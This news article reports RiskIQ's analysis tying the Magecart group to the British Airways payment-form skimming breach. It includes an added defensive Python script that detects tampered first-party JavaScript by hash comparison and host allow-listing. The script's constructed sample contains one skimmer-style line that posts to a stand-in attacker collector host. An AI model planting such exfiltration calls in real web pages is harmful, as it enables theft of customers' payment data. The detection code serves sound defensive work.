Magecart, the credit card skimming group behind the Ticketmaster breach, was also behind the British Airways breach, which was confirmed last week, say researchers.
RiskIQ's internet-scale threat detection is “alerted to new Magecart breaches hourly, a clear indication that the group is extremely active and a very real threat to all organizations offering online payment facilities,” said a statement from RiskIQ issued this week.
Magecart uses “scripts injected into websites to steal data that’s entered into online payment forms on e-commerce sites,” explained RiskIQ back in July. At the time, Magecart was implicated in the Ticketmaster breach, in which payment details held by a third-party supplier to Ticketmaster, known as Inbenta, were stolen.
This time, RiskIQ says that the attack was similar to the one leveled against Ticketmaster but “with one key difference: instead of compromising commonly used third-party functionality to gain access to hundreds of sites at once, Magecart operatives compromised the British Airways site directly and planned their attack around the site’s unique structure and functionality.”
RiskIQ says that its analysis shows that “the functionality of the payment forms on the British Airways’ website was copied and modified to deliver payment information to an attacker-controlled server while maintaining their intended functionality to avoid detection.”
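Because the skimmer was a modified copy of a script the site already served, a hash baseline of first-party JavaScript plus a review of the hosts each script references is one practical detection. The following is an added defender-side example, not code from the original article or from RiskIQ; the allow-listed hosts, script path and sample script bodies are constructed for illustration.

```python
"""Baseline check for first-party JavaScript on a payment page.

Detects scripts whose content changed (or appeared anew) since the last
known-good snapshot and lists any hosts they reference that are not on the
site's allow-list. All hosts, paths and script bodies below are constructed.
"""
import hashlib
import re
from typing import Dict, List

# Assumed allow-list of hosts the payment page is expected to contact.
ALLOWED_HOSTS = {"www.example-airline.test", "cdn.example-airline.test"}

# Constructed sample: a known-good script and a tampered copy that keeps the
# original behaviour but appends a call to an unknown host.
ORIGINAL_JS = "window.addEventListener('load',function(){/* feature checks */});"
TAMPERED_JS = ORIGINAL_JS + "postTo('https://collector.example-attacker.test/');"

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def sha256_hex(content: str) -> str:
    """SHA-256 of the script body, used as the baseline fingerprint."""
    return hashlib.sha256(content.encode("utf-8")).hexdigest()

def build_baseline(scripts: Dict[str, str]) -> Dict[str, str]:
    """Map script path -> SHA-256 of its known-good content."""
    return {path: sha256_hex(body) for path, body in scripts.items()}

def foreign_hosts(body: str) -> List[str]:
    """Hosts referenced by the script that are not on the allow-list."""
    return sorted({h for h in URL_RE.findall(body) if h not in ALLOWED_HOSTS})

def check_scripts(baseline: Dict[str, str], current: Dict[str, str]) -> List[dict]:
    """One finding per script that is new or whose hash no longer matches."""
    findings = []
    for path, body in current.items():
        expected = baseline.get(path)
        if expected is None or expected != sha256_hex(body):
            findings.append({
                "path": path,
                "reason": "new script" if expected is None else "hash mismatch",
                "foreign_hosts": foreign_hosts(body),
            })
    return findings

if __name__ == "__main__":
    baseline = build_baseline({"/js/vendor.js": ORIGINAL_JS})
    for finding in check_scripts(baseline, {"/js/vendor.js": TAMPERED_JS}):
        print(finding)
```

In practice the baseline would be rebuilt on each authorised deployment and the current set fetched by a scheduled crawl of the live payment page.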
The attackers were also aware of the way the British Airways mobile app was constructed, leveraging the fact that it used much of the same functionality as the web-app and could, therefore, victimise users in the same way.
“This attack is a highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer,” said Yonathan Klijnsma, Head Researcher at RiskIQ. “This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.”
The researchers also found evidence that Magecart operatives may have breached the British Airways site several days before the skimming began. RiskIQ web-crawling data shows that a certificate used on the attacker’s command and control server was issued on August 15th, nearly a week before the reported start date of the attack on August 21st.